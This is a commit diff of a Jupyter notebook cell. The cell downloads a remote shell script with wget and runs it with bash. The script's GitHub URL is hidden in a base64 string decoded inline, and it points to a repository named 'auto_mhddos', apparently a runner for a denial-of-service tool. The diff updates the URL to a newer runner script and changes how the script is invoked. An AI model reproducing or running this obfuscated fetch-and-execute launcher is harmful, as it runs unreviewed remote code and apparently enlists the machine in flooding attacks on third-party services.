cleaned up runner.new.sh

--- a/main.ipynb
+++ b/main.ipynb
@@ -23,9 +23,10 @@
    "outputs": [],
    "source": [
     "%cd ~\n",
-    "name=\"@placeholder@\"\n",
-    "!wget -O {name}.sh $(echo aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3doaXRlLXNhZ2l0dGFyaXVzL2F1dG9fbWhkZG9zL2ZlYXR1cmUvZHluYW1pYy9ydW5uZXIuc2gK | base64 --decode) &> /dev/null\n",
-    "!bash {name}.sh"
+    "name=\"_replace_me_with_unique_name_in_latin_\"\n",
+    "!wget -O {name}.sh $(echo aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3doaXRlLXNhZ2l0dGFyaXVzL2F1dG9fbWhkZG9zL2ZlYXR1cmUvZHluYW1pYy9ydW5uZXIubmV3LnNoCg== | base64 -d)\n",
+    "!echo 'echo \"{name}\"' >> {name}.sh\n",
+    "!bash {name}.sh -e {name}"
    ],
    "metadata": {
     "collapsed": false,
